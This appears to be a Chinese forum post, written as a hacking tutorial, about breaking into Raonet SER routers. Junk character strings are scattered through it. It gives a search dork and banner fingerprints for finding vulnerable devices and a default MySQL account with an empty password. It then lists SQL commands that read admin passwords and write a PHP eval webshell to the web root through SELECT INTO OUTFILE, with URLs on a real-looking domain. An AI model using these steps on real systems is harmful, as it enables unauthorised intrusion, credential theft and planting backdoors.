寻找存在漏洞的路由器方法:
# ^$ X/ A7 p5 }) [& K; n0 D) _
& o* P& [+ C) K8 p* y0 u1:google搜索'Raonet Subscriber Ethernet Router'
* n* n/ `* T* B, \1 v& b, s" d# Y: ?, R6 x3 z
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
5 D T! l6 t. }4 T4 u7 [0 }+ S) z( B, A& u- a
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) w* _* e& Q L$ l Y
( L3 }: t6 h$ [' K& l
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
& V- ?4 h" b7 c$ z
* g0 b3 j1 N( _' U3 A( u2 n : ]" r# n! g i- Z% Q% D8 J% Q+ Y
6 U5 q, M3 M9 x5 h' E/ F
入侵步骤:
/ G8 t8 Y5 ~- X- | [+ n4 ]" R) U9 s$ o+ y5 p- D. K
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
1 a/ D2 d1 [7 I9 [9 ~( Q. f- W
5 Z, Z" B: J" R2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc- B! R* d+ H$ z$ V9 m4 ]" Q
3:得到密码后连接,查看GUI管理密码:1 q; ~ G6 p- V# {; ^! w
use ser_500& ]' o) V% l7 A ?& o0 V/ y: E/ M g
select id,passwd from user;
. l0 S: @' R& O0 n& [* L: Q4:通过数据库写入webshell,执行命令:9 T! ^; A, [& b0 ^. B0 p, H5 |' j
use mysql;+ g4 \4 i# Y ?6 o# M
create table ok(cmd TEXT);$ Q$ |3 `6 j$ `: H
insert into ok values("<?php @eval($_POST[cmd])?>");, Y# |) X! j6 _7 A
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";. A: v8 N1 s! O+ J2 X
drop table ok;/ a" h) K- C7 J: Z, j
* A; `% ^! J$ r. J9 l( I
5:连接后门shell.php " v4 X9 y6 v! J
9 h1 n* K x$ S; I
6. 搞定!
7 T9 G5 G5 {5 V% \! q
" w" p. ]4 m" @6 q9 z% { |